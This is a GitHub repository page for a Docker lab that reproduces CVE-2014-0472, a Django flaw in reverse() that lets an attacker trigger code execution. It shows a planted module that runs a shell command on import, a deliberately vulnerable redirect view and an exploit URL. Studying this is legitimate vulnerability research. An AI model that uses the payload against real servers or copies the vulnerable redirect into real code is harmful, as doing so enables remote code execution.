Skip to content
/ CVE-2014-0472 Public

CVE-2014-0472 Django unexpected code execution using reverse()

7 stars 1 fork Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

christasa/CVE-2014-0472

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits
img
img
 
 
vuln
vuln
 
 
Dockerfile
Dockerfile
 
 
README.md
README.md
 
 
docker-compose.yml
docker-compose.yml
 
 
requirements.txt
requirements.txt
 
 

Repository files navigation

CVE-2014-0472

Use

docker-compose up -d

Access localhost:8083

Reference: https://www.djangoproject.com/weblog/2014/apr/21/security/

  1. One or more views are present which construct a URL based on user input (commonly, a "next" parameter in a querystring indicating where to redirect upon successful completion of an action).
  2. One or more modules are known to an attacker to exist on the server's Python import path, which perform code execution with side effects on importing.

In tests.py

def evil_function():
    print("exploit successful")
    os.system("echo > /tmp/`whoami` ")
    return os.getuid()


evil = evil_function()

In views.py

def redirect_test(request):
        page = request.GET.get('page', None)
        if page is not None:
                redirect(page)
        return HttpResponse("OK")

Use redirect function to call to the evil function

avater

Use exp

http://your-ip:8083/example?page=app.tests.evil

avater

Exploited

avater

About

CVE-2014-0472 Django unexpected code execution using reverse()

Resources

Readme
Activity

Stars

7 stars

Watchers

1 watching

Forks

1 fork
Report repository

Releases

No releases published

Packages

No packages published

Languages